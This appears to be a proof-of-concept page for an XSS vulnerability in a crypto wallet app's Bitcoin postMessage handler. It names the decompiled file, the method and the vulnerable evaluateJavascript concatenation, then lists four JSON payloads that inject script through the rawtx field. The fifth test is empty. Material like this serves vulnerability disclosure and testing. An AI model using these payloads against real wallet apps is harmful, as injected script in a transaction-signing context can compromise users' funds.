🎯 Bitcoin XSS Focused PoC

🚨 Bundle.data XSS Attack Vector

This PoC exploits the XSS vulnerability where the rawtx field from postMessage gets stored in bundle.data and directly concatenated into JavaScript without sanitization.

🔍 Vulnerability Details

File: Hzv.java (Bitcoin protocol handler)
Method: aMV_() - lines 87, 122, 148
Vulnerable Code: huw.evaluateJavascript(navigationBarInfo + ".sendResponse(" + huw.getWeb3JsIdSign() + ",\"" + string + "\")", null);
Attack Vector: rawtx field → bundle.data → direct JavaScript concatenation

🔸 Test 1: signPsbt Method XSS

{ "id": "123", "name": "pushPsbt", "object": { "rawtx": "\"); alert('XSS via signPsbt!'); //" } }

🔸 Test 2: signPsbts Method XSS

{ "id": "123", "name": "pushPsbt", "object": { "rawtx": "\"); alert('XSS via signPsbts!'); //" } }

🔸 Test 3: Default Case XSS

{ "id": "123", "name": "pushPsbt", "object": { "rawtx": "\"); alert('XSS via default case!'); //" } }

🔸 Test 4: Advanced XSS Payload

{ "id": "123", "name": "pushPsbt", "object": { "rawtx": "\"); alert('XSS via bundle.data!'); document.body.innerHTML='

HACKED!

'; //" } }

🔸 Test 5: All Methods at Once

Ready to test Bitcoin XSS vulnerabilities...